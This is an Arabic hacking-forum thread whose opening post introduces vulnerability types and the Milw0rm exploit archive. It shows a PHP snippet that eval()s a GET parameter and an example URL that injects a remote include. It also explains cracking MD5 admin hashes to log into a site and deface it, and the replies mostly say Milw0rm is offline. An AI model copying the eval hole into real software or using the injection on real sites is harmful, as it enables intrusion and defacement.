اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل مب

وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل مب


النتائج 1 إلى 10 من 10

الموضوع: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل مب

  1. #1
    محظور Array
    تاريخ التسجيل
    Sep 2009
    المشاركات
    49

    افتراضي وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل مب










    درسنا هو عباره عن الثغرات؟ماهي الثغرات؟ماهي انواعها؟من اين نحصل عليها؟

    بسم الله نبدأ.

    ماهي الثغرات:-

    هي داله او دوال تمكنك من استخدامها بطرق غير شرعيه, و ذلك اما بادراج اكواد, او اضافه رابط,

    او استعلام عن اوامر القاعده او تطبيق اوامر مباشره,

    و الهدف كله يصب في معرفه معلومات و باسوردات و خفايا موقعك التي لا تمكن الشخص العادي من معرفتها,

    وطبعا تختلف مدى خطوره الثغرات من ثغره الى اخرى,

    الان عرفنا تقريبا ما هي الثغرات و من ماذا تمكنا اذا وجدناها.

    سؤال: ما هو سبب حدوث هذه الاخطاء..!!

    السبب: يكمن بخطأ مبرمج و ذلك بترك مجال لعمليه مفتوحه المصدر دون ان يغلقها,

    مثال :

    <?
    $mos = $_GET['mos'];
    eval($mos);
    ?>

    يعني: لو فرضنا انه المبرمج هنا ترك ملف mos = مفتوح ((طبعا الملف وقت الطلب يحضر لك الملف المربوط معه و هو

    mos)) لو فرضنا انه تركه مفتوح دون اغلاقه و الواضح بعلامه $_GET انت وقتها تستطيع ان تدرج ملف او رابط اخر من

    خارج الموقع او السيرفر,و هذا ما يسمى بثغرات الفايل انكلود,وهي ثغرات تسمح لك بادراج ملف باكدور للاتصال

    بالسيرفر واختراقه.

    طريقه الاستغلال :

    eval.php?mos=include($include);&include=http://www.google.com

    eval.php = إسم الملف

    mos = هذي المتغير إلي يستقبل أكواد من الخارج

    include = داله إستدعاء ملف

    $include = المتغير المراد إستدعائه

    الان عرفنا ماهي الثغرات,وشرح مبسط عن كيفيه الاستغلال,

    نأتي للقسم الثاني من الدرس الي هو ماهي انواع الثغرات ومن اين نحصل عيها.

    الان انته تيجي تسأل سؤال من اين احصل عل الثغرات..!!

    تستطيع الحصول على اخر الثغرات من مواقع السيكيوريتي,وافضل موقع يقدم هذه الثغرات اللي هو موقع

    www.Milw0rm.com



    الان نأتي لانواع الثغرات اللي تنزل بالموقع.

    نبدأ بشرح انواع الثغرات,

    نجي لأول نوع من ثغرات..

    ثغرات الريموت:

    ReMoTe



    هذه الثغرات تعتبر من اقوى انواع الثغرات,ومعناها التحكم عن بعد,يعني تتحكم في السيرفر من بعد

    شرط ان الثغره يجب ان تعمل وان لا تكون مرقعه,وأن يكون البرنامج المصاب بالثغره مركب على السيرفر,

    يعني مثلا فحصنا السيرفر من الثغرات وطلع فيه برنامج يشتغل على بورت معين ومصاب بالثغره,

    تجد الثغرات في هذا القسم,وطبها هذا الاختراق المتقدم والمستهدف.

    النوع الثاني من الثغرات ثغرات اللوكل:

    LoCaL



    هذه الثغرات نفس ثغرات النوع الاول,ولكن تختلف عنها بشكل خفيف,وهذه الثغرات تنزل غير مترجمه

    وتكون مكتوبه بلغه السي,وهذه الثغرات خاصه ايضا بالبرامج والثغره قويه بس اخف من الريموت بشوي,

    النوع الثالث من الثغرات..ثغرات الويب:

    W e b Apps




    هذه ثغرات سكريبتات المواقع,يعني السكربتات اللي بتكون مركبه على المواقع او السيرفر,

    مثل سكريبتات الصور وسكريبتات التحميل..آلخ.واي ثغره بتكتشف بتنزل في هذا القسم مع الاستغلال,

    وثغرات السكريبتات انواع مثل ماشرحنا فوق,مثل ثغرات الفايل انكلود وثغرات الـSQL والكوماند,

    واستغلالها يكون سهل.سنتطرق اليه في مواضيع ثانيه.


    النوع الرابع من الثغرات:

    dos / poc



    هذه الثغرات غير قويه وقليل ما تزبط معك,ماتقدر تسوي شيء فيها الا عمل كراش وتعليق للسيرفر,

    يعني ماتقدر تلعب بالمواقع اللي على السيرفر, ولا تحط اندكس ولا شيء بس تعلق السيرفر ,

    يعني مافيها فايده الا التعليق وعمل كراش,

    النوع الخامس من الثغرات:

    S h e l l Code




    هذه الثغرات هي عباره عن كود برمجي ي تحقنه في الموقع من خلال الشل او غير يخليك تتصل عكسي او يضيف

    يوزر جديد..آلخ,ابس لازم يكون البرنامج مركب في السيرفر.
    القسم السادس من الـMilw0rm

    papers



    هذه زي الكتب بس غالبا او دائما ماتلقى كتاب عربي.

    القسم السابع وهو قسم الفيديوهات:

    Videos



    هذا القسم ينزل في شروحات فيديو للثغرات,لكن ما فيه عربي.

    نيجي لقسم اخر وهو قسم مهم في الـMilw0rm

    اللي هو فك تشفير الباسوردات,مثلا جبت ثغره واستغليتها وطلع لك اسم الادمن والباسورد مشفر

    وغالبا الباسورد ما يكون مشفر بمقياس Md5 في نفس الموقع تستطيع فك تشفير الباسورد,واختراق الموقع

    بدخول الى لوحه التحكم الرئيسيه وتعليق الاندكس الخاص بك.

    نشرح كيف نفك الباسورد:

    نذهب الى كلمه Cracker



    ثم نذهب الى
    insert


    ثم نملأ البيانات


    انتهى الشرح بحمد الله,



  2. #2
    هكر مجتهد Array الصورة الرمزية darts
    تاريخ التسجيل
    Jan 2010
    الدولة
    ببلاد الله الواسعة
    المشاركات
    330

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    الله يعطيك العفية بس موقع ميلورم ما شغال ليش يا ترى ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟


  3. #3
    هكر مجتهد Array الصورة الرمزية sahrawi7
    تاريخ التسجيل
    Dec 2009
    المشاركات
    444

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    الله يعطيك العفية بس موقع ميلورم ما شغال ليش يا ترى ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Dec 2009
    المشاركات
    32

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    شكرا اخي الكريم على المجهود الرائع
    بس متل ماقال الاخ sahrawi7 موقع ميلورم مو شغال
    يسلموا يا غالي


  5. #5
    هكر مبتديء Array الصورة الرمزية Hacker Tabuk
    تاريخ التسجيل
    Jul 2010
    المشاركات
    46

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    مشكووووور وانا زكم مو شغال عندي اظن لان الانترنت ضعيف


  6. #6

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    شرح كافي ووافي وتسلم يمينك عالشرح الجميل

    مشكور الله يعطيك العافية

    اما بالنسبة للميلورم فهو بحكم المغلق لا لأن النت ضعيف

    يوجد بديل والكثير من مواقع السيكيورتي



  7. #7
    هكر مجتهد Array الصورة الرمزية Root Killer
    تاريخ التسجيل
    Aug 2010
    الدولة
    IN THE ROOT
    المشاركات
    305

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    مشكوووور والله يعطيك ألف عافية


  8. #8
    هكر مبتديء Array الصورة الرمزية kadirofe
    تاريخ التسجيل
    May 2010
    الدولة
    غرداية
    المشاركات
    96

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    اخي مشكور على المجهود لكن الشرح منقول وقديم
    اليك موقع الثغراث الجديد www.exploit-db.com
    نحن في انتظار اندكسك


  9. #9
    محظور Array
    تاريخ التسجيل
    Jul 2010
    الدولة
    وكر الذئب
    المشاركات
    754

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    اقتباس المشاركة الأصلية كتبت بواسطة kadirofe مشاهدة المشاركة
    اخي مشكور على المجهود لكن الشرح منقول وقديم
    اليك موقع الثغراث الجديد www.exploit-db.com
    نحن في انتظار اندكسك
    أوافقك الرأي 100% الشرح قديم ومنقول وشكرا .... بس على كل حال ما منرد حد خايب يعطيك ألف عافية وشكرا >>>>



  10. #10
    :: إدارة :: Aljyyosh Team Array الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    افتراضي رد: وداعا لبرامج اكتشاف الثغرات...اى ثغرة تحبث عنها ستجدها هنا...واخترق بالجملة..ادخل

    خخخخخخخخخخ الموقع له فتره كبيره مغلق خخخخخ
    يغلق!


المواضيع المتشابهه

  1. طريقة اكتشاف الثغرات للمبتدئين با الفيديو مع التطبيق ..
    بواسطة هكر سوداني في المنتدى قسم الثغرات
    مشاركات: 71
    آخر مشاركة: 02-26-2014, 05:39 PM
  2. وداعا للبحث عن الثغرات
    بواسطة numper1 في المنتدى قسم الثغرات
    مشاركات: 12
    آخر مشاركة: 01-29-2012, 12:39 AM
  3. اليوم جبتلكم كمان سلسله اكتشاف الثغرات
    بواسطة السيد مارس في المنتدى قسم الثغرات
    مشاركات: 11
    آخر مشاركة: 01-29-2012, 12:39 AM
  4. الدرس الاول - البحث عن الثغرات في ميلوورم وتطبيق على ثغرة Sql injection
    بواسطة الشريف 515 في المنتدى منتدى الإختراق العام
    مشاركات: 3
    آخر مشاركة: 09-28-2010, 01:39 AM
  5. اكتشاف ثغرة local root في أنظمة FreeBSD
    بواسطة _majhol_ في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 01-30-2010, 02:26 PM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات سوداني

اكتشاف ثغرات السيرفرات

اكتشاف الثغرات في المواقع

ثغرة سوداني

ثغرة في شبكة سوداني

احدث الثقرات للشبكة سوداني

اكتشف اي ثغرة مواقع

موقع اكتشاف الثغرات لشبكات الاتصال

إكتشاف التغرات في المواقع

موقع بحث عن ثغرات شبكات الاتصال

http:www.aljyyosh.comvbshowthread.phpt=13895

ثغرات للنت سوداني.com

ثغرات جملة

اكتشاف التغرات في السيرفر

كشف ثغرات شبكة الاتصالكيفيه معرفه.الثغره.لسودانيبرنامج ثغرة سودانيثغرات شبكه سودانيثغرات سوداني للنتكشف الثغرات في الشبكهثغرات سرفر SDSكيف تجد ثغرات في شبكة الجوالمعرفه الثغره شغالهاداة معرفت الثقرات الشغالةتطبيق لكشف الثغرات

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •